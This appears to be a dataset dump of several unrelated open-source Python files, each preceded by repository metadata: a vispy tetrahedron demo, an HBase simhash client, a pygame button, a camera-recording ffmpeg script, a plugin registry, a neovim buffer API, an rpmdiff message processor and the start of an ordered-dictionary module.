77
0.53766
false
4.874887
false
false
false
liubenyuan/vispy-tutorial
examples/04-tetrahedron.py
1
4445
# pylint: disable=invalid-name, no-member, unused-argument
""" passing varyings to fragment """

import numpy as np
from vispy import app, gloo
from vispy.util.transforms import translate, perspective, rotate

# note the 'color' and 'v_color' in vertex
vertex = """
uniform mat4 u_model;          // Model matrix
uniform mat4 u_view;           // View matrix
uniform mat4 u_projection;     // Projection matrix
uniform vec4 u_color;          // mask color for edge plotting
attribute vec3 a_position;
attribute vec4 a_color;
varying vec4 v_color;
void main()
{
    gl_Position = u_projection * u_view * u_model * vec4(a_position, 1.0);
    v_color = a_color * u_color;
}
"""

# note the varying 'v_color', it must have the same name as in the vertex.
fragment = """
varying vec4 v_color;
void main()
{
    gl_FragColor = v_color;
}
"""


class Canvas(app.Canvas):
    """ build canvas class for this demo """

    def __init__(self):
        """ initialize the canvas """
        app.Canvas.__init__(self,
                            size=(512, 512),
                            title='scaling quad',
                            keys='interactive')

        # shader program
        tet = gloo.Program(vert=vertex, frag=fragment)

        # vertices
        V = np.array([(0, 0, 0),
                      (1, 0, 0),
                      (1.0/2.0, np.sqrt(3.0)/2.0, 0),
                      (1.0/2.0, np.sqrt(3.0)/6.0, np.sqrt(2.0/3.0))],
                     dtype=np.float32)

        # triangles specified by connecting matrix,
        # it can also be initialized using itertools
        I = np.array([(0, 1, 2),
                      (0, 3, 1),
                      (0, 2, 3),
                      (1, 3, 2)], dtype=np.uint32)

        # edges, used for drawing outline
        E = np.array([(0, 1), (1, 2), (2, 0),
                      (1, 3), (2, 3), (0, 3)], dtype=np.uint32)

        # colors of vertices
        C = np.array([(1, 0, 0, 1),
                      (0, 1, 0, 1),
                      (0, 0, 1, 1),
                      (1, 1, 0, 1)], dtype=np.float32)

        # bind to data
        tet['a_position'] = V
        tet['a_color'] = C
        self.I = gloo.IndexBuffer(I)
        self.E = gloo.IndexBuffer(E)

        # initialize transformation matrix
        view = np.eye(4, dtype=np.float32)
        model = np.eye(4, dtype=np.float32)
        projection = np.eye(4, dtype=np.float32)

        # set view
        view = translate((0, 0, -5))
        tet['u_model'] = model
        tet['u_view'] = view
        tet['u_projection'] = projection

        # bind your program
        self.program = tet

        # config and set viewport
        gloo.set_viewport(0, 0, *self.physical_size)
        gloo.set_clear_color('white')
        gloo.set_state('translucent')
        gloo.set_polygon_offset(1.0, 1.0)

        # bind a timer
        self.timer = app.Timer('auto', self.on_timer)
        self.theta = 0.0
        self.phi = 0.0
        self.timer.start()

        # show the canvas
        self.show()

    def on_resize(self, event):
        """ canvas resize callback """
        ratio = event.physical_size[0] / float(event.physical_size[1])
        self.program['u_projection'] = perspective(45.0, ratio, 2.0, 10.0)
        gloo.set_viewport(0, 0, *event.physical_size)

    def on_draw(self, event):
        """ canvas update callback """
        gloo.clear()

        # Filled cube
        gloo.set_state(blend=True, depth_test=False,
                       polygon_offset_fill=True)
        self.program['u_color'] = [1.0, 1.0, 1.0, 0.8]
        self.program.draw('triangles', self.I)

        # draw outline
        gloo.set_state(blend=False, depth_test=False,
                       polygon_offset_fill=True)
        self.program['u_color'] = [0.0, 0.0, 0.0, 1.0]
        self.program.draw('lines', self.E)

    def on_timer(self, event):
        """ canvas time-out callback """
        self.theta += .5
        self.phi += .5
        # note the convention is, theta is applied first and then phi
        # see vispy.utils.transforms,
        # python is row-major and opengl is column major,
        # so the rotate function transposes the output.
        model = np.dot(rotate(self.theta, (0, 1, 0)),
                       rotate(self.phi, (0, 0, 1)))
        self.program['u_model'] = model
        self.update()


# Finally, we show the canvas and we run the application.
c = Canvas()
app.run()
apache-2.0
7,396,573,617,910,617,000
30.524823
74
0.525309
false
3.39313
false
false
false
seomoz/simhash-db-py
simhash_db/hbase_client.py
1
3893
#! /usr/bin/env python

'''Our code to connect to the HBase backend. It uses the happybase package,
which depends on the Thrift service that (for now) is part of HBase.'''

from gevent import monkey
monkey.patch_all()

import struct

import happybase
import Hbase_thrift

from . import BaseClient


def column_name(integer):
    '''Convert an integer to a column name.'''
    return 'f%02d:c' % integer


class Client(BaseClient):
    '''Our HBase backend client'''

    def __init__(self, name, num_blocks, num_bits, *args, **kwargs):
        BaseClient.__init__(self, name, num_blocks, num_bits)

        # Time to live in seconds
        ttl = kwargs.pop('ttl', None)
        if ttl is None:
            raise ValueError
        self.connection = happybase.Connection(**kwargs)
        families = {column_name(i): dict(time_to_live=ttl)
                    for i in range(self.num_tables)}
        try:
            self.connection.create_table(name, families)
        except Hbase_thrift.AlreadyExists:
            pass
        self.table = self.connection.table(name)

    def delete(self):
        '''Delete this database of simhashes'''
        if self.table is not None:
            self.connection.delete_table(self.name, disable=True)
            self.table = None

    def insert(self, hash_or_hashes):
        '''Insert one (or many) hashes into the database'''
        if self.table is None:
            return
        hashes = hash_or_hashes
        if not hasattr(hash_or_hashes, '__iter__'):
            hashes = [hash_or_hashes]

        for hsh in hashes:
            for i in range(self.num_tables):
                row_key = struct.pack('!Q',
                                      long(self.corpus.tables[i].permute(hsh)))
                self.table.put(row_key, {column_name(i): None})

    def find_in_table(self, hsh, table_num, ranges):
        '''Return all the results found in this particular table'''
        low = struct.pack('!Q', ranges[table_num][0])
        high = struct.pack('!Q', ranges[table_num][1])
        pairs = self.table.scan(row_start=low, row_stop=high,
                                columns=[column_name(table_num)])
        results = [struct.unpack('!Q', k)[0] for k, v in pairs]
        results = [self.corpus.tables[table_num].unpermute(d)
                   for d in results]
        return [h for h in results
                if self.corpus.distance(h, hsh) <= self.num_bits]

    def find_one(self, hash_or_hashes):
        '''Find one near-duplicate for the provided query (or queries)'''
        if self.table is None:
            return None
        hashes = hash_or_hashes
        if not hasattr(hash_or_hashes, '__iter__'):
            hashes = [hash_or_hashes]

        results = []
        for hsh in hashes:
            ranges = self.ranges(hsh)
            found = []
            for i in range(self.num_tables):
                found = self.find_in_table(hsh, i, ranges)
                if found:
                    results.append(found[0])
                    break
            if not found:
                results.append(None)

        if not hasattr(hash_or_hashes, '__iter__'):
            return results[0]
        return results

    def find_all(self, hash_or_hashes):
        '''Find all near-duplicates for the provided query (or queries)'''
        if self.table is None:
            return None
        hashes = hash_or_hashes
        if not hasattr(hash_or_hashes, '__iter__'):
            hashes = [hash_or_hashes]

        results = []
        for hsh in hashes:
            ranges = self.ranges(hsh)
            found = []
            for i in range(self.num_tables):
                found.extend(self.find_in_table(hsh, i, ranges))
            found = list(set(found))
            results.append(found)

        if not hasattr(hash_or_hashes, '__iter__'):
            return results[0]
        return results
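An illustrative sketch of how this Python 2 era client might be driven, assuming a reachable HBase Thrift service; the table name, block/bit counts, TTL, and host are all assumptions:

from simhash_db.hbase_client import Client

client = Client('simhashes', 6, 3, ttl=7 * 24 * 3600, host='localhost')
client.insert(0x8A3D70A3D70A3D71)
print(client.find_one(0x8A3D70A3D70A3D71))  # the stored hash, or None
print(client.find_all(0x8A3D70A3D70A3D71))  # list of near-duplicate hashes
client.delete()                              # drop the backing table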
mit
7,742,667,128,239,649,000
31.714286
79
0.553301
false
3.936299
false
false
false
awes0menessInc/python-projects
Alien-Invasion/button.py
1
1269
import pygame.font


class Button():
    """ A class to create a button. """

    def __init__(self, screen, msg):
        """Initialize button attributes."""
        self.screen = screen
        self.screen_rect = screen.get_rect()

        # Set the dimensions and properties of the button.
        self.width, self.height = 200, 50
        self.button_color = (0, 255, 0)
        self.text_color = (255, 255, 255)
        self.font = pygame.font.SysFont(None, 48)

        # Build the button's rect object and center it.
        self.rect = pygame.Rect(0, 0, self.width, self.height)
        self.rect.center = self.screen_rect.center

        # The button message needs to be prepped only once.
        self.prep_msg(msg)

    def prep_msg(self, msg):
        """Turn msg into a rendered image and center text on the button."""
        self.msg_image = self.font.render(msg, True, self.text_color,
                                          self.button_color)
        self.msg_image_rect = self.msg_image.get_rect()
        self.msg_image_rect.center = self.rect.center

    def draw_button(self):
        # Draw blank button and then draw message.
        self.screen.fill(self.button_color, self.rect)
        self.screen.blit(self.msg_image, self.msg_image_rect)
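A short, illustrative way to exercise the class above; the window size and caption text are arbitrary:

import pygame
from button import Button

pygame.init()
screen = pygame.display.set_mode((800, 600))
play_button = Button(screen, "Play")
play_button.draw_button()
pygame.display.flip()  # make the freshly drawn button visible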
mit
4,828,632,466,260,825,000
35.257143
75
0.602049
false
3.754438
false
false
false
msfrank/mandelbrot
mandelbrot/registry.py
1
3001
# Copyright 2015 Michael Frank <msfrank@syntaxjockey.com>
#
# This file is part of Mandelbrot.
#
# Mandelbrot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mandelbrot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mandelbrot.  If not, see <http://www.gnu.org/licenses/>.

import pkg_resources
import logging

log = logging.getLogger("mandelbrot.registry")

from mandelbrot import versionstring

require_mandelbrot = 'mandelbrot == ' + versionstring()

class Registry(object):
    """
    """
    def __init__(self):
        self.env = pkg_resources.Environment([])
        plugins,errors = pkg_resources.working_set.find_plugins(self.env)
        for plugin in plugins:
            pkg_resources.working_set.add(plugin)
        for error in errors:
            log.info("failed to load distribution: %s", error)
        self.overrides = {}

    def override_factory(self, entry_point_type, factory_name, factory):
        """
        :param entry_point_type:
        :type entry_point_type: str
        :param factory_name:
        :type factory_name: str
        :param factory:
        :type factory: type
        """
        self.overrides[(entry_point_type,factory_name)] = factory

    def lookup_factory(self, entry_point_type, factory_name, factory_type, requirement=require_mandelbrot):
        """
        :param entry_point_type:
        :type entry_point_type: str
        :param factory_name:
        :type factory_name: str
        :param factory_type:
        :type factory_type: type
        :param requirement:
        :type requirement: str
        """
        log.debug("looking up '%s' of type %s with requirement %s",
                  factory_name, entry_point_type, requirement)
        # check factory overrides first
        if (entry_point_type,factory_name) in self.overrides:
            factory = self.overrides[(entry_point_type,factory_name)]
        # find the entrypoint matching the specified requirement
        else:
            requirement = pkg_resources.Requirement.parse(requirement)
            distribution = pkg_resources.working_set.find(requirement)
            factory = distribution.load_entry_point(entry_point_type, factory_name)
        log.debug("loaded factory %s.%s", factory.__module__, factory.__class__.__name__)
        # verify that the factory is the correct type
        if not issubclass(factory, factory_type):
            raise TypeError("{}.{} is not a subclass of {}".format(
                factory.__module__, factory.__class__.__name__, factory_type.__name__))
        return factory
gpl-3.0
-5,360,309,663,945,176,000
39.013333
107
0.654782
false
4.088556
false
false
false
lunixbochs/actualvim
lib/neovim/api/buffer.py
1
6063
"""API for working with a Nvim Buffer.""" from .common import Remote from ..compat import IS_PYTHON3 __all__ = ('Buffer') if IS_PYTHON3: basestring = str def adjust_index(idx, default=None): """Convert from python indexing convention to nvim indexing convention.""" if idx is None: return default elif idx < 0: return idx - 1 else: return idx class Buffer(Remote): """A remote Nvim buffer.""" _api_prefix = "nvim_buf_" def __len__(self): """Return the number of lines contained in a Buffer.""" return self.request('buffer_line_count') def _get_lines(self, start, end, strict): lines = self.request_raw('nvim_buf_get_lines', start, end, strict) return [line.decode('utf8') for line in lines] def _set_lines(self, start, end, strict, lines): lines = [line.encode('utf8') for line in lines] return self.request_raw('nvim_buf_set_lines', start, end, strict, lines) def __getitem__(self, idx): """Get a buffer line or slice by integer index. Indexes may be negative to specify positions from the end of the buffer. For example, -1 is the last line, -2 is the line before that and so on. When retrieving slices, omiting indexes(eg: `buffer[:]`) will bring the whole buffer. """ if not isinstance(idx, slice): i = adjust_index(idx) return self._get_lines(i, i + 1, True)[0] start = adjust_index(idx.start, 0) end = adjust_index(idx.stop, -1) return self._get_lines(start, end, False) def __setitem__(self, idx, item): """Replace a buffer line or slice by integer index. Like with `__getitem__`, indexes may be negative. When replacing slices, omiting indexes(eg: `buffer[:]`) will replace the whole buffer. """ if not isinstance(idx, slice): i = adjust_index(idx) lines = [item] if item is not None else [] return self._set_lines(i, i + 1, True, lines) lines = item if item is not None else [] start = adjust_index(idx.start, 0) end = adjust_index(idx.stop, -1) return self._set_lines(start, end, False, lines) def __iter__(self): """Iterate lines of a buffer. This will retrieve all lines locally before iteration starts. This approach is used because for most cases, the gain is much greater by minimizing the number of API calls by transfering all data needed to work. """ lines = self[:] for line in lines: yield line def __delitem__(self, idx): """Delete line or slice of lines from the buffer. This is the same as __setitem__(idx, []) """ self.__setitem__(idx, None) def append(self, lines, index=-1): """Append a string or list of lines to the buffer.""" if isinstance(lines, (basestring, bytes)): lines = [lines] return self._set_lines(index, index, True, lines) def mark(self, name): """Return (row, col) tuple for a named mark.""" return self.request('nvim_buf_get_mark', name) def range(self, start, end): """Return a `Range` object, which represents part of the Buffer.""" return Range(self, start, end) def add_highlight(self, hl_group, line, col_start=0, col_end=-1, src_id=-1, async=None): """Add a highlight to the buffer.""" if async is None: async = (src_id != 0) return self.request('nvim_buf_add_highlight', src_id, hl_group, line, col_start, col_end, async=async) def clear_highlight(self, src_id, line_start=0, line_end=-1, async=True): """Clear highlights from the buffer.""" self.request('nvim_buf_clear_highlight', src_id, line_start, line_end, async=async) @property def name(self): """Get the buffer name.""" return self.request('nvim_buf_get_name') @name.setter def name(self, value): """Set the buffer name. 
BufFilePre/BufFilePost are triggered.""" return self.request('nvim_buf_set_name', value) @property def valid(self): """Return True if the buffer still exists.""" return self.request('nvim_buf_is_valid') @property def number(self): """Get the buffer number.""" return self.handle class Range(object): def __init__(self, buffer, start, end): self._buffer = buffer self.start = start - 1 self.end = end - 1 def __len__(self): return self.end - self.start + 1 def __getitem__(self, idx): if not isinstance(idx, slice): return self._buffer[self._normalize_index(idx)] start = self._normalize_index(idx.start) end = self._normalize_index(idx.stop) if start is None: start = self.start if end is None: end = self.end + 1 return self._buffer[start:end] def __setitem__(self, idx, lines): if not isinstance(idx, slice): self._buffer[self._normalize_index(idx)] = lines return start = self._normalize_index(idx.start) end = self._normalize_index(idx.stop) if start is None: start = self.start if end is None: end = self.end + 1 self._buffer[start:end] = lines def __iter__(self): for i in range(self.start, self.end + 1): yield self._buffer[i] def append(self, lines, i=None): i = self._normalize_index(i) if i is None: i = self.end + 1 self._buffer.append(lines, i) def _normalize_index(self, index): if index is None: return None if index < 0: index = self.end else: index += self.start if index > self.end: index = self.end return index
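A hedged sketch of how the Buffer wrapper above is normally reached through the client; the socket path is an assumption:

import neovim

nvim = neovim.attach('socket', path='/tmp/nvim.sock')  # path is an assumption
buf = nvim.current.buffer
buf[0] = 'first line'            # replace line 1
buf.append(['second', 'third'])  # append after the last line
print(buf[:])                    # the whole buffer as a list of str
print(buf.name, len(buf))        # buffer path and line count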
mit
3,638,414,735,793,391,600
30.414508
80
0.568036
false
3.937013
false
false
false
mikehankey/fireball_camera
ffmpeg_record.py
1
2859
#!/usr/bin/python3

import glob
import sys
import subprocess
import os
import time

video_dir = "/mnt/ams2"


def check_running(cam_num, type):
    if type == "HD":
        cmd = "ps -aux |grep \"ffmpeg\" | grep \"HD\" | grep \"cam" + cam_num + "\" | grep -v grep | wc -l"
    else:
        cmd = "ps -aux |grep \"ffmpeg\" | grep \"SD\" | grep \"cam" + cam_num + "\" | grep -v grep | wc -l"
    print(cmd)
    output = subprocess.check_output(cmd, shell=True).decode("utf-8")
    output = int(output.replace("\n", ""))
    return(int(output))


def start_capture(cam_num):
    running = check_running(cam_num, "HD")
    if running == 0:
        cmd = "/usr/bin/ffmpeg -i rtsp://192.168.76.7" + cam_num + "/av0_0 -c copy -map 0 -f segment -strftime 1 -segment_time 60 -segment_format mp4 \"" + video_dir + "/HD/" + "%Y-%m-%d_%H-%M-%S-cam" + cam_num + ".mp4\" 2>&1 > /dev/null & "
        print(cmd)
        os.system(cmd)
        time.sleep(2)
    else:
        print ("ffmpeg already running for cam:", cam_num)

    running = check_running(cam_num, "SD")
    if running == 0:
        cmd = "/usr/bin/ffmpeg -i rtsp://192.168.76.7" + cam_num + "/av0_1 -c copy -map 0 -f segment -strftime 1 -segment_time 60 -segment_format mp4 \"" + video_dir + "/SD/" + "%Y-%m-%d_%H-%M-%S-cam" + cam_num + ".mp4\" 2>&1 > /dev/null & "
        print(cmd)
        os.system(cmd)
        time.sleep(2)
    else:
        print ("ffmpeg already running for cam:", cam_num)


def stop_capture(cam_num):
    #print ("Stopping capture for ", cam_num)
    cmd = "kill -9 `ps -aux | grep ffmpeg |grep -v grep| awk '{print $2}'`"
    output = subprocess.check_output(cmd, shell=True).decode("utf-8")
    print (output)


def purge(cam_num):
    cur_time = int(time.time())
    #cmd = "rm " + cam_num + "/*"
    #print (cmd)
    #os.system(cmd)
    for filename in (glob.glob(video_dir + '/' + cam_num + '/*.mp4')):
        st = os.stat(filename)
        mtime = st.st_mtime
        tdiff = cur_time - mtime
        tdiff = tdiff / 60 / 60 / 24
        if tdiff >= .8:
            cmd = "rm " + filename
            print(cmd)
            os.system(cmd)
            #file_list.append(filename)


try:
    cmd = sys.argv[1]
    cam_num = sys.argv[2]
except:
    do_all = 1

if (cmd == "stop"):
    stop_capture("1")

if (cmd == "start"):
    start_capture(cam_num)

if (cmd == "start_all"):
    start_capture("1")
    start_capture("2")
    start_capture("3")
    start_capture("4")
    start_capture("5")
    start_capture("6")

if (cmd == "purge"):
    purge(cam_num)

if (cmd == "check_running"):
    running = check_running(cam_num, "HD")
    print (running)
    running = check_running(cam_num, "SD")
    print (running)

if (cmd == "purge_all"):
    purge("1")
    purge("2")
    purge("3")
    purge("4")
    purge("5")
    purge("6")

#ffmpeg -i rtsp://192.168.76.71/av0_1 -c copy -map 0 -f segment -segment_time 60 -segment_format mp4 "1/capture-1-%03d.mp4" &
gpl-3.0
4,738,862,852,939,186,000
25.971698
239
0.564533
false
2.841948
false
false
false
release-engineering/fedmsg_meta_umb
fedmsg_meta_umb/rpmdiff.py
1
2379
# Copyright (C) 2017 Red Hat, Inc.
#
# fedmsg_meta_umb is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# fedmsg_meta_umb is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with fedmsg; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Authors:  Ralph Bean <rbean@redhat.com>

from fedmsg.meta.base import BaseProcessor


class RPMDiffProcessor(BaseProcessor):
    topic_prefix_re = r'/topic/VirtualTopic\.eng'

    __name__ = 'rpmdiff'
    __description__ = 'the rpmdiff analysis system'
    __link__ = 'https://rpmdiff.engineering.redhat.com/'
    __docs__ = 'https://docs.engineering.redhat.com/display/EXD/rpmdiff'
    __obj__ = 'RPMDiff Analysis System'
    __icon__ = '_static/img/icons/erratatool50.png'

    def title(self, msg, **config):
        return msg['topic'].split('.', 2)[-1]

    def subtitle(self, msg, **config):
        action = self.title(msg, **config).split('.')[-1]
        if msg['msg']['type'] == 'COMPARISON':
            kwargs = dict(
                action=action,
                package=msg['msg']['package_name'],
                baseline='-'.join(msg['msg']['baseline'].rsplit('-', 2)[1:]),
                target='-'.join(msg['msg']['nvr'].rsplit('-', 2)[1:]),
            )
            template = ('rpmdiff comparison of {package} is {action} '
                        '({target} against {baseline})')
            return template.format(**kwargs)
        elif msg['msg']['type'] == 'ANALYSIS':
            kwargs = dict(action=action, nvr=msg['msg']['nvr'])
            template = 'rpmdiff analysis of {nvr} is {action}'
            return template.format(**kwargs)

    def packages(self, msg, **config):
        return set([msg['msg']['package_name']])

    def link(self, msg, **config):
        template = 'https://rpmdiff.engineering.redhat.com/run/{run_id}/'
        return template.format(**msg['msg'])
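A hedged sketch of how fedmsg.meta would exercise this processor, assuming fedmsg and fedmsg_meta_umb are installed; the topic suffix and the NVR are made up for illustration:

import fedmsg.config
import fedmsg.meta

config = fedmsg.config.load_config()
fedmsg.meta.make_processors(**config)
msg = {
    'topic': '/topic/VirtualTopic.eng.rpmdiff.job.completed',
    'msg': {'type': 'ANALYSIS', 'package_name': 'bash',
            'nvr': 'bash-4.4.19-7.el8'},
}
print(fedmsg.meta.msg2subtitle(msg, **config))
# -> 'rpmdiff analysis of bash-4.4.19-7.el8 is completed'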
lgpl-2.1
5,623,728,822,967,871,000
40.736842
78
0.623792
false
3.800319
false
false
false
jesuscript/topo-mpi
param/external.py
1
68357
""" External code required for param/tkinter interface. * odict: an ordered dictionary * tilewrapper: a wrapper for Tile/ttk widgets Note that an ordered dictionary and a wrapper for ttk widgets are both available in Python 2.7. """ from __future__ import generators # odict.py # An Ordered Dictionary object # Copyright (C) 2005 Nicola Larosa, Michael Foord # E-mail: nico AT tekNico DOT net, fuzzyman AT voidspace DOT org DOT uk # This software is licensed under the terms of the BSD license. # http://www.voidspace.org.uk/python/license.shtml # Basically you're free to copy, modify, distribute and relicense it, # So long as you keep a copy of the license with it. # Documentation at http://www.voidspace.org.uk/python/odict.html # For information about bugfixes, updates and support, please join the # Pythonutils mailing list: # http://groups.google.com/group/pythonutils/ # Comments, suggestions and bug reports welcome. """A dict that keeps keys in insertion order""" __author__ = ('Nicola Larosa <nico-NoSp@m-tekNico.net>,' 'Michael Foord <fuzzyman AT voidspace DOT org DOT uk>') __docformat__ = "restructuredtext en" __revision__ = '$Id$' __version__ = '0.2.2' __all__ = ['OrderedDict', 'SequenceOrderedDict'] import sys INTP_VER = sys.version_info[:2] if INTP_VER < (2, 2): raise RuntimeError("Python v.2.2 or later required") import types, warnings class OrderedDict(dict): """ A class of dictionary that keeps the insertion order of keys. All appropriate methods return keys, items, or values in an ordered way. All normal dictionary methods are available. Update and comparison is restricted to other OrderedDict objects. Various sequence methods are available, including the ability to explicitly mutate the key ordering. __contains__ tests: >>> d = OrderedDict(((1, 3),)) >>> 1 in d 1 >>> 4 in d 0 __getitem__ tests: >>> OrderedDict(((1, 3), (3, 2), (2, 1)))[2] 1 >>> OrderedDict(((1, 3), (3, 2), (2, 1)))[4] Traceback (most recent call last): KeyError: 4 __len__ tests: >>> len(OrderedDict()) 0 >>> len(OrderedDict(((1, 3), (3, 2), (2, 1)))) 3 get tests: >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.get(1) 3 >>> d.get(4) is None 1 >>> d.get(4, 5) 5 >>> d OrderedDict([(1, 3), (3, 2), (2, 1)]) has_key tests: >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.has_key(1) 1 >>> d.has_key(4) 0 """ def __init__(self, init_val=(), strict=False): """ Create a new ordered dictionary. Cannot init from a normal dict, nor from kwargs, since items order is undefined in those cases. If the ``strict`` keyword argument is ``True`` (``False`` is the default) then when doing slice assignment - the ``OrderedDict`` you are assigning from *must not* contain any keys in the remaining dict. 
>>> OrderedDict() OrderedDict([]) >>> OrderedDict({1: 1}) Traceback (most recent call last): TypeError: undefined order, cannot get items from dict >>> OrderedDict({1: 1}.items()) OrderedDict([(1, 1)]) >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d OrderedDict([(1, 3), (3, 2), (2, 1)]) >>> OrderedDict(d) OrderedDict([(1, 3), (3, 2), (2, 1)]) """ self.strict = strict dict.__init__(self) if isinstance(init_val, OrderedDict): self._sequence = init_val.keys() dict.update(self, init_val) elif isinstance(init_val, dict): # we lose compatibility with other ordered dict types this way raise TypeError('undefined order, cannot get items from dict') else: self._sequence = [] self.update(init_val) ### Special methods ### def __delitem__(self, key): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> del d[3] >>> d OrderedDict([(1, 3), (2, 1)]) >>> del d[3] Traceback (most recent call last): KeyError: 3 >>> d[3] = 2 >>> d OrderedDict([(1, 3), (2, 1), (3, 2)]) >>> del d[0:1] >>> d OrderedDict([(2, 1), (3, 2)]) """ if isinstance(key, types.SliceType): # FIXME: efficiency? keys = self._sequence[key] for entry in keys: dict.__delitem__(self, entry) del self._sequence[key] else: # do the dict.__delitem__ *first* as it raises # the more appropriate error dict.__delitem__(self, key) self._sequence.remove(key) def __eq__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d == OrderedDict(d) True >>> d == OrderedDict(((1, 3), (2, 1), (3, 2))) False >>> d == OrderedDict(((1, 0), (3, 2), (2, 1))) False >>> d == OrderedDict(((0, 3), (3, 2), (2, 1))) False >>> d == dict(d) False >>> d == False False """ if isinstance(other, OrderedDict): # FIXME: efficiency? # Generate both item lists for each compare return (self.items() == other.items()) else: return False def __lt__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) >>> c < d True >>> d < c False >>> d < dict(c) Traceback (most recent call last): TypeError: Can only compare with other OrderedDicts """ if not isinstance(other, OrderedDict): raise TypeError('Can only compare with other OrderedDicts') # FIXME: efficiency? # Generate both item lists for each compare return (self.items() < other.items()) def __le__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) >>> e = OrderedDict(d) >>> c <= d True >>> d <= c False >>> d <= dict(c) Traceback (most recent call last): TypeError: Can only compare with other OrderedDicts >>> d <= e True """ if not isinstance(other, OrderedDict): raise TypeError('Can only compare with other OrderedDicts') # FIXME: efficiency? # Generate both item lists for each compare return (self.items() <= other.items()) def __ne__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d != OrderedDict(d) False >>> d != OrderedDict(((1, 3), (2, 1), (3, 2))) True >>> d != OrderedDict(((1, 0), (3, 2), (2, 1))) True >>> d == OrderedDict(((0, 3), (3, 2), (2, 1))) False >>> d != dict(d) True >>> d != False True """ if isinstance(other, OrderedDict): # FIXME: efficiency? 
# Generate both item lists for each compare return not (self.items() == other.items()) else: return True def __gt__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) >>> d > c True >>> c > d False >>> d > dict(c) Traceback (most recent call last): TypeError: Can only compare with other OrderedDicts """ if not isinstance(other, OrderedDict): raise TypeError('Can only compare with other OrderedDicts') # FIXME: efficiency? # Generate both item lists for each compare return (self.items() > other.items()) def __ge__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) >>> e = OrderedDict(d) >>> c >= d False >>> d >= c True >>> d >= dict(c) Traceback (most recent call last): TypeError: Can only compare with other OrderedDicts >>> e >= d True """ if not isinstance(other, OrderedDict): raise TypeError('Can only compare with other OrderedDicts') # FIXME: efficiency? # Generate both item lists for each compare return (self.items() >= other.items()) def __repr__(self): """ Used for __repr__ and __str__ >>> r1 = repr(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f')))) >>> r1 "OrderedDict([('a', 'b'), ('c', 'd'), ('e', 'f')])" >>> r2 = repr(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd')))) >>> r2 "OrderedDict([('a', 'b'), ('e', 'f'), ('c', 'd')])" >>> r1 == str(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f')))) True >>> r2 == str(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd')))) True """ return '%s([%s])' % (self.__class__.__name__, ', '.join( ['(%r, %r)' % (key, self[key]) for key in self._sequence])) def __setitem__(self, key, val): """ Allows slice assignment, so long as the slice is an OrderedDict >>> d = OrderedDict() >>> d['a'] = 'b' >>> d['b'] = 'a' >>> d[3] = 12 >>> d OrderedDict([('a', 'b'), ('b', 'a'), (3, 12)]) >>> d[:] = OrderedDict(((1, 2), (2, 3), (3, 4))) >>> d OrderedDict([(1, 2), (2, 3), (3, 4)]) >>> d[::2] = OrderedDict(((7, 8), (9, 10))) >>> d OrderedDict([(7, 8), (2, 3), (9, 10)]) >>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4))) >>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8))) >>> d OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)]) >>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4)), strict=True) >>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8))) >>> d OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)]) >>> a = OrderedDict(((0, 1), (1, 2), (2, 3)), strict=True) >>> a[3] = 4 >>> a OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4), (4, 5)]) Traceback (most recent call last): ValueError: slice assignment must be from unique keys >>> a = OrderedDict(((0, 1), (1, 2), (2, 3))) >>> a[3] = 4 >>> a OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a[::-1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a OrderedDict([(3, 4), (2, 3), (1, 2), (0, 1)]) >>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> d[:1] = 3 Traceback (most recent call last): TypeError: slice assignment requires an OrderedDict >>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> 